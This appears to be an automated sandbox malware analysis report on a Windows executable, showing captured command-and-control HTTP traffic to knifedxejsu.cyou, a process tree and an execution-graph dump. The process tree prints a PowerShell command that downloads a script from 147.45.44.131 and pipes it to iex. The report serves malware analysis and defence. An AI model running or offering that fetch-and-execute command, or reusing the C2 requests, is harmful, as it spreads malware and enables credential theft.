                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGDuTCbpaPtm0HgLaEsr1j%2BnY0cEz0SyvSoXHQjLStc3DHMC%2BB06duM1FLUe2jMmAQ7HrkwIYoDZVw0uGH9IGKFdDF65X%2BmFTEBpqtjikXkH3HCN80VdMl5Cf%2FGqG8Jk6oH7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9c9bb8e4225-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102395&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21601&delivery_rate=37303&cwnd=252&unsent_bytes=0&cid=158f86dbfd6bc4df&ts=920&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.11.2049728104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:25 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=7689064VB37FNRVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 1255
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:25 UTC1255OUTData Raw: 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 38 39 30 36 34 56 42 33 37 46 4e 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 0d
                                                                                                                                                                                                              Data Ascii: --7689064VB37FNRVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--7689064VB37FNRVVVContent-Disposition: form-data; name="pid"1--7689064VB37FNRVVVContent-Disposition: form-data; name="lid"HpOoIh--@topgcr
                                                                                                                                                                                                              2024-11-07 16:55:26 UTC1006INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:26 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=7fafpst44arg4cedr2rtj5v6h5; expires=Mon, 03-Mar-2025 10:42:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62imPcFoFHT7%2BoP2SOjQSfO6gDPOGS69pub64BPaLcTg1vkRuWo4X11dCaAKCREAqnFPC3JWBw%2FClaVANiSjdayuUqQzbLLKWk5h5uAYsNEmdL3dDXRraiqgsXw7hQeoLUmD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9d13b5bc329-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102668&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2171&delivery_rate=37275&cwnd=252&unsent_bytes=0&cid=b1790e75e1610bbe&ts=573&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:26 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.11.2049729104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:26 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=LUQ4FGKV3NFZNRVVVVVVV
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 1158
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:26 UTC1158OUTData Raw: 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 55 51 34 46 47 4b 56 33 4e 46 5a 4e 52 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f
                                                                                                                                                                                                              Data Ascii: --LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="hwid"61C11A71B129FD4CDB71E32F12885CB3--LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="pid"1--LUQ4FGKV3NFZNRVVVVVVVContent-Disposition: form-data; name="lid"HpOo
                                                                                                                                                                                                              2024-11-07 16:55:27 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:27 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ircl7k7ebqm6onf83t33gjcolq; expires=Mon, 03-Mar-2025 10:42:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o23G1FhaXEHSdDTCfMe2RQ1F%2Bii3g9hSVbB0BUKjwryzuKC8DpyPRR0AYlqC%2FheNqodLqxjAk7wm%2FtMnlR1cFloudhbE8qBXfEfK3ULlFgbiTdelSt5LZg25VqfKa0fjdV8u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9d6cbb443a9-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102316&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2078&delivery_rate=37413&cwnd=252&unsent_bytes=0&cid=0d9d08dcc8bcf24f&ts=1468&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 35 36 2e 31 34 36 2e 33 36 2e 32 30 38 0d 0a
                                                                                                                                                                                                              Data Ascii: 11ok 156.146.36.208
                                                                                                                                                                                                              2024-11-07 16:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              11192.168.11.2049730104.21.19.1774431752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-07 16:55:28 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 116
                                                                                                                                                                                                              Host: knifedxejsu.cyou
                                                                                                                                                                                                              2024-11-07 16:55:28 UTC116OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 31 43 31 31 41 37 31 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@topgcr&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=61C11A71B129FD4CDB71E32F12885CB3
                                                                                                                                                                                                              2024-11-07 16:55:28 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:28 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=6gh3me61pd0cfc0mqc4envhb6s; expires=Mon, 03-Mar-2025 10:42:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3iLugQWYRzEFdpnzrcBBZr%2BxJYFTZcyto7bl2hG90ckyqpWN5KPoFqFopy2Vm%2B4L04O4WbhsGnwFElBCPG60IGAV7gruRj5jZa%2FW7q0GL87vd2%2FOK%2F8hhwpcwwmcvxgOZRD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8deed9e229fd8c36-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=102492&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1017&delivery_rate=37338&cwnd=252&unsent_bytes=0&cid=b28f18c00a07b23a&ts=545&x=0"
                                                                                                                                                                                                              2024-11-07 16:55:28 UTC54INData Raw: 33 30 0d 0a 67 44 51 63 6e 67 44 63 36 68 32 32 61 64 76 58 42 57 37 5a 7a 43 62 36 68 6b 65 49 33 4e 2b 6d 75 39 67 55 4c 4a 4a 6d 71 50 7a 62 61 51 3d 3d 0d 0a
                                                                                                                                                                                                              Data Ascii: 30gDQcngDc6h22advXBW7ZzCb6hkeI3N+mu9gULJJmqPzbaQ==
                                                                                                                                                                                                              2024-11-07 16:55:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:11:55:08
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\7IXl1M9JGV.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\7IXl1M9JGV.exe"
                                                                                                                                                                                                              Imagebase:0x7ff7d77f0000
                                                                                                                                                                                                              File size:122'368 bytes
                                                                                                                                                                                                              MD5 hash:826AC9D03E37048DF300B013335098D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:11:55:08
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6cb9a0000
                                                                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:11:55:08
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                                                                                                                                                                              Imagebase:0x7ff6b2e60000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:11:55:08
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                                                                                                                                                                              Imagebase:0x7ff715890000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:11:55:12
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
                                                                                                                                                                                                              Imagebase:0x7ff6aaf80000
                                                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:11:55:12
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"
                                                                                                                                                                                                              Imagebase:0x7ff67ed70000
                                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:11:55:12
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                                                                                                                                                                              Imagebase:0x550000
                                                                                                                                                                                                              File size:65'440 bytes
                                                                                                                                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:11:55:15
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
                                                                                                                                                                                                              Imagebase:0x7ff66aca0000
                                                                                                                                                                                                              File size:2'742'376 bytes
                                                                                                                                                                                                              MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:11:55:17
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3
                                                                                                                                                                                                              Imagebase:0x7ff66aca0000
                                                                                                                                                                                                              File size:2'742'376 bytes
                                                                                                                                                                                                              MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:11:55:21
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3
                                                                                                                                                                                                              Imagebase:0x7ff66aca0000
                                                                                                                                                                                                              File size:2'742'376 bytes
                                                                                                                                                                                                              MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                              Start time:11:55:41
                                                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                              Imagebase:0x7ff6df240000
                                                                                                                                                                                                              File size:57'360 bytes
                                                                                                                                                                                                              MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:10.7%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:12.1%
                                                                                                                                                                                                                Total number of Nodes:1762
                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                execution_graph 8073 7ff7d77fa2a4 8074 7ff7d77fa2c8 8073->8074 8076 7ff7d77fa2d8 8073->8076 8075 7ff7d77f71bc 11 API calls 8074->8075 8098 7ff7d77fa2cd 8075->8098 8077 7ff7d77fa5b8 8076->8077 8078 7ff7d77fa2fa 8076->8078 8079 7ff7d77f71bc 11 API calls 8077->8079 8080 7ff7d77fa31b 8078->8080 8140 7ff7d77fa5fc 8078->8140 8081 7ff7d77fa5bd 8079->8081 8084 7ff7d77fa38d 8080->8084 8086 7ff7d77fa341 8080->8086 8090 7ff7d77fa381 8080->8090 8082 7ff7d77f71dc 11 API calls 8081->8082 8082->8098 8088 7ff7d77f88f0 11 API calls 8084->8088 8102 7ff7d77fa350 8084->8102 8085 7ff7d77fa43a 8097 7ff7d77fa457 8085->8097 8103 7ff7d77fa4a9 8085->8103 8155 7ff7d77f5e78 8086->8155 8091 7ff7d77fa3a3 8088->8091 8090->8085 8090->8102 8161 7ff7d77fc878 8090->8161 8094 7ff7d77f71dc 11 API calls 8091->8094 8093 7ff7d77f71dc 11 API calls 8093->8098 8099 7ff7d77fa3b1 8094->8099 8095 7ff7d77fa34b 8100 7ff7d77f71bc 11 API calls 8095->8100 8096 7ff7d77fa369 8096->8090 8105 7ff7d77fa5fc 47 API calls 8096->8105 8101 7ff7d77f71dc 11 API calls 8097->8101 8099->8090 8099->8102 8107 7ff7d77f88f0 11 API calls 8099->8107 8100->8102 8104 7ff7d77fa460 8101->8104 8102->8093 8103->8102 8106 7ff7d77fbbf4 50 API calls 8103->8106 8113 7ff7d77fa465 8104->8113 8197 7ff7d77fbbf4 8104->8197 8105->8090 8108 7ff7d77fa4e6 8106->8108 8110 7ff7d77fa3d3 8107->8110 8111 7ff7d77f71dc 11 API calls 8108->8111 8115 7ff7d77f71dc 11 API calls 8110->8115 8116 7ff7d77fa4f0 8111->8116 8112 7ff7d77fa491 8117 7ff7d77f71dc 11 API calls 8112->8117 8114 7ff7d77fa5ac 8113->8114 8119 7ff7d77f88f0 11 API calls 8113->8119 8118 7ff7d77f71dc 11 API calls 8114->8118 8115->8090 8116->8102 8116->8113 8117->8113 8118->8098 8120 7ff7d77fa534 8119->8120 8121 7ff7d77fa545 8120->8121 8122 7ff7d77fa53c 8120->8122 8124 7ff7d77f6a88 47 API calls 8121->8124 8123 7ff7d77f71dc 11 API calls 8122->8123 8139 7ff7d77fa543 8123->8139 8125 7ff7d77fa554 8124->8125 8126 7ff7d77fa55c 8125->8126 8127 7ff7d77fa5e7 8125->8127 8206 7ff7d77fdfc8 8126->8206 8128 7ff7d77f70a0 17 API calls 8127->8128 8131 7ff7d77fa5fb 8128->8131 8129 7ff7d77f71dc 11 API calls 8129->8098 8133 7ff7d77fa5a4 8136 7ff7d77f71dc 11 API calls 8133->8136 8134 7ff7d77fa583 8135 7ff7d77f71bc 11 API calls 8134->8135 8137 7ff7d77fa588 8135->8137 8136->8114 8138 7ff7d77f71dc 11 API calls 8137->8138 8138->8139 8139->8129 8141 7ff7d77fa631 8140->8141 8142 7ff7d77fa619 8140->8142 8143 7ff7d77f88f0 11 API calls 8141->8143 8142->8080 8150 7ff7d77fa655 8143->8150 8144 7ff7d77fa6da 8146 7ff7d77f6ae8 47 API calls 8144->8146 8145 7ff7d77fa6b6 8147 7ff7d77f71dc 11 API calls 8145->8147 8148 7ff7d77fa6e0 8146->8148 8147->8142 8149 7ff7d77f88f0 11 API calls 8149->8150 8150->8144 8150->8145 8150->8149 8151 7ff7d77f71dc 11 API calls 8150->8151 8152 7ff7d77f6a88 47 API calls 8150->8152 8153 7ff7d77fa6c5 8150->8153 8151->8150 8152->8150 8154 7ff7d77f70a0 17 API calls 8153->8154 8154->8144 8156 7ff7d77f5e88 8155->8156 8159 7ff7d77f5e91 8155->8159 8157 7ff7d77f5b98 71 API calls 8156->8157 8156->8159 8158 7ff7d77f5e9a 8157->8158 8158->8159 8160 7ff7d77f5d60 12 API calls 8158->8160 8159->8095 8159->8096 8160->8159 8162 7ff7d77fc885 8161->8162 8163 7ff7d77ff3ec 8161->8163 8165 7ff7d77f808c 47 API calls 8162->8165 8164 7ff7d77ff3f9 8163->8164 8169 7ff7d77ff42f 8163->8169 8168 7ff7d77f71bc 11 API calls 8164->8168 8185 7ff7d77ff3a0 8164->8185 8167 7ff7d77fc8b9 8165->8167 8166 7ff7d77ff459 8171 7ff7d77f71bc 11 API calls 8166->8171 8172 7ff7d77fc8be 8167->8172 8175 7ff7d77fc8cf 8167->8175 8178 7ff7d77fc8e6 8167->8178 8170 7ff7d77ff403 8168->8170 8169->8166 8173 7ff7d77ff47e 8169->8173 8174 7ff7d77f7080 47 API calls 